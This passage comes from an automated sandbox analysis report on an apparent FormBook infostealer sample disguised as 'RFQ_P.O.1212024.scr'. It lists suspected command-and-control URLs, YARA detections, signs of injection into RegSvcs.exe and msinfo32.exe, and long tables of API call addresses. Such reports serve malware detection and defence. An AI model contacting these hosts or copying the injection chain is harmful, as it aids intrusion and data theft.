                Source: msinfo32.exe, 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmp, sqlite3.dll.12.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                Source: mrNbohrgjTw.exe, 00000014.00000002.873703699.0000000000954000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.vayui.top
                Source: mrNbohrgjTw.exe, 00000014.00000002.873703699.0000000000954000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.vayui.top/ge5i/
                Source: msinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: msinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: msinfo32.exe, 0000000C.00000002.873979376.0000000003610000.00000004.10000000.00040000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000002.873893935.0000000003A70000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: msinfo32.exe, 0000000C.00000002.874345553.0000000005300000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873979376.000000000410E000.00000004.10000000.00040000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000002.873893935.000000000456E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.5.1.min.js
                Source: msinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: msinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: msinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: msinfo32.exe, 0000000C.00000002.874345553.0000000005300000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873979376.000000000410E000.00000004.10000000.00040000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000002.873893935.000000000456E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gamesfunny.top$
                Source: msinfo32.exe, 0000000C.00000002.874345553.0000000005300000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873979376.000000000410E000.00000004.10000000.00040000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000002.873893935.000000000456E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://playchill.top/api/axgames/request?domain=$
                Source: msinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                Source: msinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: msinfo32.exe, 0000000C.00000002.874345553.0000000005300000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873979376.000000000410E000.00000004.10000000.00040000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000002.873893935.000000000456E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
                Source: RFQ_P.O.1212024.scr, PEJmengI.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: 00255Of2.12.drString found in binary or memory: https://www.google.com/favicon.ico
                Source: mrNbohrgjTw.exe, 00000014.00000002.873893935.0000000003428000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.mrpokrovskii.pro/7mvy/?x4=h6bUgYM5oQIom3SELeChVOWhI9VWPZg3BKiCH
                Source: mrNbohrgjTw.exe, 00000014.00000002.873893935.00000000040B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.873456007.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.396612978.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.461322824.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.873508536.0000000000360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.873699119.0000000001D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.398641756.00000000025C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.873703699.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: RFQ_P.O.1212024.scr
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0042CA13 NtClose,8_2_0042CA13
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009607AC NtCreateMutant,LdrInitializeThunk,8_2_009607AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095F9F0 NtClose,LdrInitializeThunk,8_2_0095F9F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095FAE8 NtQueryInformationProcess,LdrInitializeThunk,8_2_0095FAE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095FB68 NtFreeVirtualMemory,LdrInitializeThunk,8_2_0095FB68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095FDC0 NtQuerySystemInformation,LdrInitializeThunk,8_2_0095FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009600C4 NtCreateFile,8_2_009600C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00960048 NtProtectVirtualMemory,8_2_00960048
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00960078 NtResumeThread,8_2_00960078
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00960060 NtQuerySection,8_2_00960060
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009601D4 NtSetValueKey,8_2_009601D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0096010C NtOpenDirectoryObject,8_2_0096010C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00960C40 NtGetContextThread,8_2_00960C40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009610D0 NtOpenProcessToken,8_2_009610D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00961148 NtOpenThread,8_2_00961148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095F8CC NtWaitForSingleObject,8_2_0095F8CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095F900 NtReadFile,8_2_0095F900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00961930 NtSetContextThread,8_2_00961930
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095F938 NtWriteFile,8_2_0095F938
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095FAB8 NtQueryValueKey,8_2_0095FAB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095FAD0 NtAllocateVirtualMemory,8_2_0095FAD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095FA20 NtQueryInformationFile,8_2_0095FA20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095FA50 NtEnumerateValueKey,8_2_0095FA50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095FBB8 NtQueryInformationToken,8_2_0095FBB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095FBE8 NtQueryVirtualMemory,8_2_0095FBE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095FB50 NtCreateKey,8_2_0095FB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095FC90 NtUnmapViewOfSection,8_2_0095FC90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095FC30 NtOpenProcess,8_2_0095FC30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095FC48 NtSetInformationFile,8_2_0095FC48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095FC60 NtMapViewOfSection,8_2_0095FC60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00961D80 NtSuspendThread,8_2_00961D80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095FD8C NtDelayExecution,8_2_0095FD8C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095FD5C NtEnumerateKey,8_2_0095FD5C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095FEA0 NtReadVirtualMemory,8_2_0095FEA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095FED0 NtAdjustPrivilegesToken,8_2_0095FED0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095FE24 NtWriteVirtualMemory,8_2_0095FE24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095FFB4 NtCreateSection,8_2_0095FFB4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095FFFC NtCreateProcessEx,8_2_0095FFFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0095FF34 NtQueueApcThread,8_2_0095FF34
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001B50E80_2_001B50E8
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001B04E80_2_001B04E8
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001BB6300_2_001BB630
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001B46B00_2_001B46B0
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001BBC380_2_001BBC38
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001BCC5A0_2_001BCC5A
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001B3E000_2_001B3E00
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001B5F680_2_001B5F68
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001B203B0_2_001B203B
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001BC0300_2_001BC030
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001BC0220_2_001BC022
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001B80500_2_001B8050
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001BD16A0_2_001BD16A
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001B11F80_2_001B11F8
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001B82580_2_001B8258
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001B32A00_2_001B32A0
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001BC3E00_2_001BC3E0
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001B84E80_2_001B84E8
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001B86B80_2_001B86B8
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001BD6F80_2_001BD6F8
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001BB8F80_2_001BB8F8
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001BB8E80_2_001BB8E8
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001B4B480_2_001B4B48
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001B3D8E0_2_001B3D8E
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001B6E480_2_001B6E48
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001B5E800_2_001B5E80
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_006518200_2_00651820
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_006519060_2_00651906
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_006597400_2_00659740
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_006550600_2_00655060
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_006500400_2_00650040
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_00654C280_2_00654C28
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_00654C1A0_2_00654C1A
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_006554980_2_00655498
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_006559800_2_00655980
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_006547F00_2_006547F0
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_006547CF0_2_006547CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00418A138_2_00418A13
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0042F0638_2_0042F063
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004030108_2_00403010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004011208_2_00401120
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004012708_2_00401270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004102738_2_00410273
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004023648_2_00402364
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040236C8_2_0040236C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004023708_2_00402370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00416C138_2_00416C13
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040E4838_2_0040E483
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004104938_2_00410493
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040E5C78_2_0040E5C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040E5D38_2_0040E5D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040E6A68_2_0040E6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0096E0C68_2_0096E0C6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0096E2E98_2_0096E2E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00A163BF8_2_00A163BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009963DB8_2_009963DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009723058_2_00972305
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009BA37B8_2_009BA37B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009F443E8_2_009F443E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0098C5F08_2_0098C5F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009F05E38_2_009F05E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009B65408_2_009B6540
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009746808_2_00974680
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0097E6C18_2_0097E6C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00A126228_2_00A12622
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009BA6348_2_009BA634
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0097C7BC8_2_0097C7BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0097C85C8_2_0097C85C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0099286D8_2_0099286D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009729B28_2_009729B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00A1098E8_2_00A1098E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00A049F58_2_00A049F5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009869FE8_2_009869FE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009BC9208_2_009BC920
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00A1CBA48_2_00A1CBA4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009F6BCB8_2_009F6BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00A12C9C8_2_00A12C9C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009FAC5E8_2_009FAC5E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009A0D3B8_2_009A0D3B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0097CD5B8_2_0097CD5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009A2E2F8_2_009A2E2F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0098EE4C8_2_0098EE4C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00A0CFB18_2_00A0CFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009E2FDC8_2_009E2FDC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00980F3F8_2_00980F3F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0099D0058_2_0099D005
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0098905A8_2_0098905A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009730408_2_00973040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009ED06D8_2_009ED06D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009FD13F8_2_009FD13F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00A112388_2_00A11238
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0096F3CF8_2_0096F3CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009773538_2_00977353
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009814898_2_00981489
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009A54858_2_009A5485
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009AD47D8_2_009AD47D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00A135DA8_2_00A135DA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0097351F8_2_0097351F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009F579A8_2_009F579A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009A57C38_2_009A57C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00A0771D8_2_00A0771D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00A0F8EE8_2_00A0F8EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009EF8C48_2_009EF8C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009F59558_2_009F5955
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009F394B8_2_009F394B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00A23A838_2_00A23A83
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0096FBD78_2_0096FBD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009FDBDA8_2_009FDBDA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00997B008_2_00997B00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00A0FDDD8_2_00A0FDDD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009FBF148_2_009FBF14
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0099DF7C8_2_0099DF7C
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001D50E810_2_001D50E8
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001D04E810_2_001D04E8
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001DB5BE10_2_001DB5BE
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001D46B010_2_001D46B0
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001DBC3810_2_001DBC38
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001DCC5A10_2_001DCC5A
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001D3E0010_2_001D3E00
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001D5F6810_2_001D5F68
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001D203B10_2_001D203B
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001DC03010_2_001DC030
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001DC02210_2_001DC022
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001D805010_2_001D8050
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001DD16A10_2_001DD16A
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001D11F810_2_001D11F8
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001D825810_2_001D8258
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001D32A010_2_001D32A0
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001DC3E010_2_001DC3E0
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001D84E810_2_001D84E8
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001D86B810_2_001D86B8
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001DD6F810_2_001DD6F8
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001DB8F810_2_001DB8F8
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001DB8E810_2_001DB8E8
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001D4B4810_2_001D4B48
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001D3D6010_2_001D3D60
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001D5E5010_2_001D5E50
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001D6E4810_2_001D6E48
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_001D5E8010_2_001D5E80
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_005C182010_2_005C1820
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_005C190610_2_005C1906
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_005C8F8110_2_005C8F81
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_005C505010_2_005C5050
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_005C004010_2_005C0040
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_005C4C2810_2_005C4C28
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_005C549810_2_005C5498
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_005C598010_2_005C5980
